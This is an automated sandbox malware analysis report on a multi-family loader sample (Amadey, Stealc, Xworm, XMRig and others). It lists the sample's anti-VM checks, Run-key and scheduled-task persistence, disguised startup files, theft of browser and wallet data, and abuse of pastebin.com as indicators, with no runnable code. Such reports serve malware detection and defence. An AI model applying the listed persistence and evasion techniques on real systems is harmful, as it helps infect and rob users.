Malware Analysis Report

2025-04-03 09:26

Sample ID 250305-26nlbssmx5
Target dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c
SHA256 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c
Tags
amadey gcleaner healer litehttp stealc systembc xmrig xworm 092155 trump bot defense_evasion discovery dropper execution loader miner persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c

Threat Level: Known bad

The file dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc systembc xmrig xworm 092155 trump bot defense_evasion discovery dropper execution loader miner persistence rat spyware stealer trojan

Stealc family

Stealc

xmrig

LiteHTTP

Litehttp family

Healer family

Xmrig family

GCleaner

Xworm family

Amadey family

Detect Xworm Payload

Xworm

Gcleaner family

Healer

Detects Healer an antivirus disabler dropper

SystemBC

Systembc family

Amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Identifies Wine through registry keys

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Drops startup file

.NET Reactor proctector

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates processes with tasklist

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Kills process with taskkill

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 23:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 23:11

Reported

2025-03-05 23:14

Platform

win10v2004-20250217-en

Max time kernel

105s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rjbum\abfjdu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rjbum\abfjdu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rjbum\abfjdu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\rjbum\abfjdu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\ProgramData\rjbum\abfjdu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\250c1f6b4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\250c1f6b4d.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\860be6c356.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\860be6c356.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\07d2efa8fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\07d2efa8fe.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\840fb92a2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\840fb92a2b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rjbum\abfjdu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
